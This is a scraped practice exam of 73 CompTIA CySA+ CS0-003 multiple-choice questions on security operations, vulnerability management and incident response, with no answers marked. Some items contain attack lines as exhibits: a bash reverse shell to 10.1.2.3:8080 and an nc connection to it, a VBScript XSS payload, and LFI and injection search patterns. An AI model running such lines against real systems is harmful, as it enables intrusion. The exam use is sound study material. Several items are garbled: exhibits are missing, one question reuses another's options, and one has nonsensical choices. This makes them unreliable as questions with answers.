Test B CompTIA CYSA+ CS0-003
Title of test: Test B CompTIA CYSA+ CS0-003
Description: CompTIA CYSA+ CS0-003
1. A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?
- The server was configured to use SSL to securely transmit data.
- The server was supporting weak TLS protocols for client connections.
- The malware infected all the web servers in the pool.
- The digital certificate on the web server was self-signed.

2. A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:
- Log entry 1.
- Log entry 2.
- Log entry 3.
- Log entry 4.

3. A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?
- Interview the users who access these systems.
- Scan the systems to see which vulnerabilities currently exist.
- Configure alerts for vendor-specific zero-day exploits.
- Determine the asset value of each system.

4. A security analyst is reviewing the following alert that was triggered by FIM on a critical system:
- A fake antivirus program was installed by the user.
- A network drive was added to allow exfiltration of data.
- A new program has been set to execute on system start.
- The host firewall on 192.168.1.10 was disabled.

5. Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?
- SLA.
- LOI.
- MOU.
- KPI.

6. A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?
- Data exfiltration.
- Rogue device.
- Scanning.
- Beaconing.

7. An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Choose two.)
- Drop the tables on the database server to prevent data exfiltration.
- Deploy EDR on the web server and the database server to reduce the adversary’s capabilities.
- Stop the httpd service on the web server so that the adversary cannot use web exploits.
- Use microsegmentation to restrict connectivity to/from the web and database servers.
- Comment out the HTTP account in the /etc/passwd file of the web server.
- Move the database from the database server to the web server.

8. An incident response team member is triaging a Linux server. The output is shown below:
- Create a backdoor root account named zsh.
- Execute commands through an unsecured service account.
- Send a beacon to a command-and-control server.
- Perform a denial-of-service attack on the web server.

9. A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: getConnection(database01,"alpha" ,"AxTv.127GdCx94GTd"); Which of the following is the most likely vulnerability in this system?
- Lack of input validation.
- SQL injection.
- Hard-coded credential.
- Buffer overflow.

10. A technician is analyzing output from a popular network mapping tool for a PCI audit:
- The host is not up or responding.
- The host is running excessive cipher suites.
- The host is allowing insecure cipher suites.
- The Secure Shell port on this host is closed.

11. A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?
- SIEM.
- XDR.
- SOAR.
- EDR.

12. An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?
- Disable the user’s network account and access to web resources.
- Make a copy of the files as a backup on the server.
- Place a legal hold on the device and the user’s network share.
- Make a forensic image of the device and create a SHA-1 hash.

13. An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?
- Insider threat.
- Ransomware group.
- Nation-state.
- Organized crime.

14. A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?
- config.in.
- ntds.dit.
- Master boot record.
- Registry.

15. While reviewing web server logs, a security analyst found the following line: < IMG SRC='vbscript:msgbox("test")' > Which of the following malicious activities was attempted?
- Command injection.
- XML injection.
- Server-side request forgery.
- Cross-site scripting.

16. A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://office365password.acme.co. The site’s standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?
- This is a normal password change URL.
- The security operations center is performing a routine password audit.
- A new VPN gateway has been deployed.
- A social engineering attack is underway.

17. A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?
- Operating system version.
- Registry key values.
- Open ports.
- IP address.

18. A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?
- /etc/shadow.
- curl localhost.
- ; printenv.
- cat /proc/self/.

19. A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?
- Non-credentialed scanning.
- Passive scanning.
- Agent-based scanning.
- Credentialed scanning.

20. A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?
- Leave the proxy as is.
- Decommission the proxy.
- Migrate the proxy to the cloud.
- Patch the proxy.

21. An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?
- Access rights.
- Network segmentation.
- Time synchronization.
- Invalid playbook.

22. An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?
- SOAR.
- SIEM.
- SLA.
- IoC.

23. An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst’s concern?
- Any discovered vulnerabilities will not be remediated.
- An outage of machinery would cost the organization money.
- Support will not be available for the critical machinery.
- There are no compensating controls in place for the OS.

24. Which of the following describes the best reason for conducting a root cause analysis?
- The root cause analysis ensures that proper timelines were documented.
- The root cause analysis allows the incident to be properly documented for reporting.
- The root cause analysis develops recommendations to improve the process.
- The root cause analysis identifies the contributing items that facilitated the event.

25. Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?
- Command and control.
- Data enrichment.
- Automation.
- Single sign-on.

26. A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device’s operating system. Which of the following best meets this requirement?
- SIEM.
- CASB.
- SOAR.
- EDR.

27. A security analyst identified the following suspicious entry on the host-based IDS logs: bash -i >& /dev/tcp/10.1.2.3/8080 0>&1 Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?
- #!/bin/bash nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" || echo "OK"
- #!/bin/bash ps -fea | grep 8080 >dev/null && echo "Malicious activity" || echo "OK"
- #!/bin/bash ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" || echo "OK"
- #!/bin/bash netstat -antp | grep 8080 >dev/null && echo "Malicious activity" || echo "OK"

28. A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?
- Implement segmentation with ACLs.
- Configure logging and monitoring to the SIEM.
- Deploy MFA to cloud storage locations.
- Roll out an IDS.

29. A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?
- Deploy a WAF to the front of the application.
- Replace the current MD5 with SHA-256.
- Deploy an antivirus application on the hosting system.
- Replace the MD5 with digital signatures.

30. A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?
- Conduct security awareness training on the risks of using unknown and unencrypted USBs.
- Write a removable media policy that explains that USBs cannot be connected to a company asset.
- Check configurations to determine whether USB ports are enabled on company assets.
- Review logs to see whether this exploitable vulnerability has already impacted the company.

31. A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?
- Nmap.
- TCPDump.
- SIEM.
- EDR.

32. A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:
- Directory traversal.
- XSS.
- XXE.
- SSRF.

33. Which of the following is the most important factor to ensure accurate incident response reporting?
- A well-defined timeline of the events.
- A guideline for regulatory reporting.
- Logs from the impacted system.
- A well-developed executive summary.

34. A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?
- grep [IP address] packets.pcap
- cat packets.pcap | grep [IP Address]
- tcpdump -n -r packets.pcap host [IP address]
- strings packets.pcap | grep [IP Address]

35. A security analyst reviews the latest vulnerability scans and observes there are vulnerabilities with similar CVSSv3 scores but different base score metrics. Which of the following attack vectors should the analyst remediate first?
- CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

36. A security analyst must review a suspicious email to determine its legitimacy. Which of the following should be performed? (Choose two.)
- Evaluate scoring fields, such as Spam Confidence Level and Bulk Complaint Level.
- Review the headers from the forwarded email.
- Examine the recipient address field.
- Review the Content-Type header.
- Evaluate the HELO or EHLO string of the connecting email server.
- Examine the SPF, DKIM, and DMARC fields from the original email.

37. A vulnerability analyst received a list of system vulnerabilities and needs to evaluate the relevant impact of the exploits on the business. Given the constraints of the current sprint, only three can be remediated. Which of the following represents the least impactful risk, given the CVSS3.1 base scores?
- AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L - Base Score 6.0
- AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:L - Base Score 7.2
- AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H - Base Score 6.4
- AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L - Base Score 6.5

38. A recent vulnerability scan resulted in an abnormally large number of critical and high findings that require patching. The SLA requires that the findings be remediated within a specific amount of time. Which of the following is the best approach to ensure all vulnerabilities are patched in accordance with the SLA?
- Integrate an IT service delivery ticketing system to track remediation and closure.
- Create a compensating control item until the system can be fully patched.
- Accept the risk and decommission current assets as end of life.
- Request an exception and manually patch each system.

39. Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?
- Join an information sharing and analysis center specific to the company's industry.
- Upload threat intelligence to the IPS in STIX/TAXII format.
- Add data enrichment for IPs in the ingestion pipeline.
- Review threat feeds after viewing the SIEM alert.

40. An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation?
- Multifactor authentication.
- Password changes.
- System hardening.
- Password encryption.

41. A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?
- Deploy agents on all systems to perform the scans.
- Deploy a central scanner and perform non-credentialed scans.
- Deploy a cloud-based scanner and perform a network scan.
- Deploy a scanner sensor on every segment and perform credentialed scans.

42. An organization's email account was compromised by a bad actor. Given the following information:
- Data masking.
- Hashing.
- Watermarking.
- Encoding.

43. A security administrator needs to import PII data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?
- Data masking.
- Hashing.
- Watermarking.
- Encoding.

44. The email system administrator for an organization configured DKIM signing for all email legitimately sent by the organization. Which of the following would most likely indicate an email is malicious if the company's domain name is used as both the sender and the recipient?
- The message fails a DMARC check.
- The sending IP address is the hosting provider.
- The signature does not meet corporate standards.
- The sender and reply address are different.

45. During an incident involving phishing, a security analyst needs to find the source of the malicious email. Which of the following techniques would provide the analyst with this information?
- Header analysis.
- Packet capture.
- SSL inspection.
- Reverse engineering.

46. An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed?
- Blocklisting.
- Allowlisting.
- Graylisting.
- Webhooks.

47. During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?
- Shut down the server.
- Reimage the server.
- Quarantine the server.
- Update the OS to latest version.

48. An organization recently changed its BC and DR plans. Which of the following would best allow for the incident response team to test the changes without any impact to the business?
- Perform a tabletop drill based on previously identified incident scenarios.
- Simulate an incident by shutting down power to the primary data center.
- Migrate active workloads from the primary data center to the secondary location.
- Compare the current plan to lessons learned from previous incidents.

49. Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?
- Deploy a database to aggregate the logging.
- Configure the servers to forward logs to a SIEM.
- Share the log directory on each server to allow local access.
- Automate the emailing of logs to the analysts.

50. Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?
- Mean time to detect.
- Mean time to respond.
- Mean time to remediate.
- Service-level agreement uptime.

51. After identifying a threat, a company has decided to implement a patch management program to remediate vulnerabilities. Which of the following risk management principles is the company exercising?
- Transfer.
- Accept.
- Mitigate.
- Avoid.

52. A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?
- Wipe the computer and reinstall software.
- Shut down the email server and quarantine it from the network.
- Acquire a bit-level image of the affected workstation.
- Search for other mail users who have received the same file.

53. The security analyst received the monthly vulnerability report. The following findings were included in the report:
• Five of the systems only required a reboot to finalize the patch application
• Two of the servers are running outdated operating systems and cannot be patched
The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?
- Compensating controls.
- Due diligence.
- Maintenance windows.
- Passive discovery.

54. The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company:
- Vulnerability A.
- Vulnerability B.
- Vulnerability C.
- Vulnerability D.

55. An incident response analyst is taking over an investigation from another analyst. The investigation has been going on for the past few days. Which of the following steps is most important during the transition between the two analysts?
- Identify and discuss the lessons learned with the prior analyst.
- Accept all findings and continue to investigate the next item target.
- Review the steps that the previous analyst followed.
- Validate the root cause from the prior analyst.

56. A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information:
- nessie.explosion.
- vote.4p.
- sweet.bike.
- great.skills.

57. A recent penetration test discovered that several employees were enticed to assist attackers by visiting specific websites and running downloaded files when prompted by phone calls. Which of the following would best address this issue?
- Increasing training and awareness for all staff.
- Ensuring that malicious websites cannot be visited.
- Blocking all scripts downloaded from the internet.
- Disabling all staff members’ ability to run downloaded applications.

58. A security analyst at a company is reviewing an alert from the file integrity monitoring indicating a mismatch in the login.html file hash. After comparing the code with the previous version of the page source code, the analyst found the following code snippet added:
- Obfuscated links.
- Exfiltration.
- Unauthorized changes.
- Beaconing.

59. A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?
- Credentialed scan.
- External scan.
- Differential scan.
- Network scan.

60. An organization enabled a SIEM rule to send an alert to a security analyst distribution list when ten failed logins occur within one minute. However, the control was unable to detect an attack with nine failed logins. Which of the following best represents what occurred?
- False positive.
- True negative.
- False negative.
- True positive.

61. A cybersecurity analyst is tasked with scanning a web application to understand where the scan will go and whether there are URIs that should be denied access prior to more in-depth scanning. Which of the following best fits the type of scanning activity requested?
- Uncredentialed scan.
- Discovery scan.
- Vulnerability scan.
- Credentialed scan.

62. Which of the following best describes the process of requiring remediation of a known threat within a given time frame?
- SLA.
- MOU.
- Best-effort patching.
- Organizational governance.

63. Which of the following risk management principles is accomplished by purchasing cyber insurance?
- Accept.
- Avoid.
- Mitigate.
- Transfer.

64. A recent audit of the vulnerability management program outlined the finding for increased awareness of secure coding practices. Which of the following would be best to address the finding?
- Establish quarterly SDLC training on the top vulnerabilities for developers.
- Conduct a yearly inspection of the code repositories and provide the report to management.
- Hire an external penetration test of the network.
- Deploy more vulnerability scanners for increased coverage.

65. An organization has deployed a cloud-based storage system for shared data that is in phase two of the data life cycle. Which of the following controls should the security team ensure are addressed? (Choose two.)
- Data classification.
- Data destruction.
- Data loss prevention.
- Encryption.
- Backups.
- Access controls.

66. An analyst is conducting routine vulnerability assessments on the company infrastructure. When performing these scans, a business-critical server crashes, and the cause is traced back to the vulnerability scanner. Which of the following is the cause of this issue?
- The scanner is running without an agent installed.
- The scanner is running in active mode.
- The scanner is segmented improperly.
- The scanner is configured with a scanning window.

67. An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?
- Set user account control protection to the most restrictive level on all devices.
- Implement MFA requirements for all internal resources.
- Harden systems by disabling or removing unnecessary services.
- Implement controls to block execution of untrusted applications.

68. A new zero-day vulnerability was released. A security analyst is prioritizing which systems should receive deployment of compensating controls first. The systems have been grouped into the categories shown below:
- Group A.
- Group B.
- Group C.
- Group D.

69. A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?
- OSSTMM.
- Diamond Model of Intrusion Analysis.
- OWASP.
- MITRE ATT&CK.

70. Which of the following actions would an analyst most likely perform after an incident has been investigated?
- Risk assessment.
- Root cause analysis.
- Incident response plan.
- Tabletop exercise.

71. After completing a review of network activity, the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily at 10:00 p.m. Which of the following is potentially occurring?
- Irregular peer-to-peer communication.
- Rogue device on the network.
- Abnormal OS process behavior.
- Data exfiltration.

72. A vulnerability scanner generates the following output:
- Oracle JDK.
- Cisco Webex.
- Redis Server.
- SSL Self-signed Certificate.

73. A web application team notifies a SOC analyst that there are thousands of HTTP/404 events on the public-facing web server. Which of the following is the next step for the analyst to take?
- Instruct the firewall engineer that a rule needs to be added to block this external server.
- Escalate the event to an incident and notify the SOC manager of the activity.
- Notify the incident response team that there is a DDoS attack occurring.
- Identify the IP/hostname for the requests and look at the related activity.